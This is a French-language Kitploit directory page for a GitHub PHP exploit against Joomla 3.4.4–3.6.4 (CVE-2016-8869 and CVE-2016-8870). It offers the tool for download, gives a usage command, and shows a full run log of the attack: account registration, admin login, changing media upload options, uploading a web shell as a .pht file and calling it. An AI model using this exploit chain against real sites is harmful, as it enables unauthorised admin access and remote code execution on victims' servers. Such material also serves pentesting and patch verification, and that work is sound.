Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
JoomlaCVE20168869 — Exploit pour Joomla 3.4.4 - 3.6.4 (CVE-2016-8869 et CVE-2016-8870) | Kitploit
Outils/GitHubGitHub/rustyj4ck/joomlacve20168869
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubrustyj4ck/joomlacve20168869

JoomlaCVE20168869

Exploit pour Joomla 3.4.4 - 3.6.4 (CVE-2016-8869 et CVE-2016-8870)

Voir le dépôt
78il y a 9 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour Joomla 3.4.4 - 3.6.4 (CVE-2016-8869 et CVE-2016-8870) avec un web shell par téléchargement de fichier

Ceci est un port PHP ; le code source Python original est fourni par @link https://github.com/XiphosResearch/exploits/tree/master/Joomraa

Utilisation : php exploit.php --username hacker -p password -e [email protected] http://localhost:9994/

[0.000] Démarrage... [0.000] La victime est http://localhost:9994 [0.000] [-] Récupération du token [0.464] ..fetch | GET | /index.php/component/users/?view=login | 200 [0.464] Token | 6cebed4c64eae7e8915b0bc7e0ca354e [0.464] [-] Création du compte utilisateur [0.760] ..fetch | POST | /index.php/component/users/?task=user.register | 303 [0.760] [!] Le compte n'a pas été créé ou existe déjà [0.760] [-] Récupération du token pour la connexion admin [1.113] ..fetch | GET | /administrator/index.php | 200 [1.113] Token | af3c362c9aa19347451656d2d24b79f2 [1.113] [-] Connexion à l'admin [2.368] ..fetch | POST | /administrator/index.php | 200 [2.368] [+] Connexion admin réussie ! [2.368] [+] Récupération des options des médias [3.221] ..fetch | GET | /administrator/index.php?option=com_config&view=component&component=com_media&path= | 200 [4.470] ..fetch | POST | /administrator/index.php?option=com_config | 200 [4.470] [] Téléversement du shell [5.329] ..fetch | GET | /administrator/index.php?option=com_media&folder= | 200 [5.330] [-] Téléversement de l'exploit vers | /images/1k8iusc.pht [6.415] ..fetch | POST | http://localhost:9994/administrator/index.php?option=com_media&task=file.upload&tmpl=component&ed5766f9587758a07f90d6b1ba846723=r2pci9ua7bao40na38foiq7da7&b5dab50228f1e955bae66d8950cc29a7=1&format=html | 200 [6.415] [] Appel de l'exploit [6.417] ..fetch | GET | /1.php | 200 [6.417] [$] Exploit réussi !

Télécharger l’outil